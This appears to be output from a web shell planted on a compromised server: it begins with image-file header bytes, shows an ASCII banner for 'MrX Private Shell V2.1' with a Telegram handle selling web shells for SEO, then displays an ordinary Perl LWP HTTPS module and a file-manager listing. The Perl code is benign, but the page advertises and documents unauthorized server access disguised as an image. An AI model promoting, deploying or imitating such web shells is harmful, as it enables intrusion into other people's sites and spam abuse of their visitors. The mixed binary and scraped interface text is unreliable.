����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
package LWP::Protocol::https::hosts;
use strict;
use warnings;
use parent 'LWP::Protocol::https';
use LWP::UserAgent::DNS::Hosts;
sub _extra_sock_opts {
my ($self, $host, $port) = @_;
my @opts = $self->SUPER::_extra_sock_opts($host, $port);
if (my $peer_addr = LWP::UserAgent::DNS::Hosts->_registered_peer_addr($host)) {
push @opts, (
PeerAddr => $peer_addr,
Host => $host,
SSL_verifycn_name => $host,
SSL_hostname => $host, # for SNI
);
}
return @opts;
}
sub socket_class { 'LWP::Protocol::https::Socket' }
1;
__END__
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| hosts.pm | File | 637 B | 0444 |
|